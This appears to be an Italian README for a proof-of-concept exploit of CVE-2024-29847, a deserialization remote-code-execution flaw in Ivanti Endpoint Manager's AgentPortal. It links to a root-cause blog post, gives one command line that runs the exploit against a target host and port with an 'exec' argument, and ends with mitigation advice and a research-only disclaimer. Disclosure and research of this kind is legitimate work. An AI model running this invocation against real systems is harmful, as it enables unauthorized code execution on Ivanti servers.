
Exploit per CVE-2024-29847
PoC per la vulnerabilità di esecuzione remota di codice tramite deserializzazione di dati non attendibili in AgentPortal di Ivanti Endpoint Manager (CVE-2024-29847)
Un'analisi delle cause profonde della vulnerabilità è disponibile sul mio blog:
https://summoning.team/blog/ivanti-epm-CVE-2024-29847-deserialization-RCE/
CVE-2024-29847.exe --uselease --installdir "C:\Program Files\LANDesk\ManagementSuite\LANDesk\ManagementSuite\Core\Core.Webservices" tcp://192.168.0.200:49669/LDSM exec test
Aggiorna all'ultima versione o mitiga seguendo questo link
Questo software è stato creato esclusivamente per scopi di ricerca accademica e per lo sviluppo di tecniche difensive efficaci, e non è destinato a essere utilizzato per attaccare sistemi se non esplicitamente autorizzati. I manutentori del progetto non sono responsabili dell'uso improprio del software. Usalo in modo responsabile.